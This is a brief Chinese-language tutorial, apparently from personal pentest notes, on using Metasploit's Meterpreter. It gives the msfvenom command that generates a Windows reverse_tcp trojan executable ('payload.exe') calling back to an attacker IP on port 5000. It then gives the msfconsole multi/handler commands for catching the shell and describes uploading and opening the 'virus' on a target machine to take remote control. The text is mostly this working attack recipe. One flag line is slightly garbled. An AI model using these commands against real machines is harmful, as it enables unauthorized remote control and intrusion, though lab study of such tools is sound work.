Meterpreter生成被控端並進行遠端控制
Meterpreter簡介
Meterpreter是kali中自帶的用於滲透測試和漏洞利用的工具,它的本質上是一種payload,
允許使用者使用命令列執行命令的生成及執行
生成木馬
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本機的ip lport=5000 -f exe -o payload.exe
-p windows/meterpreter/****reverse_tcp** LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe
-p, –payloadPayload** to use;指定哪些有效載荷生成
-f, –format Output format;指定有效載荷的格式
-o, –out Save the payload;指定儲存位置
開始監聽
(我的win靶機報爆了,這裡使用舍友的靶機)
在kali中使用“msfconsole”指令進入
輪流輸入以下指令
use exploit/multi/handler //進入handler模組
set LHOST +本機IP
set LPORT +5000
run
在靶機上開啟病毒
將病毒上傳至靶機上,開啟
成功實現遠端操控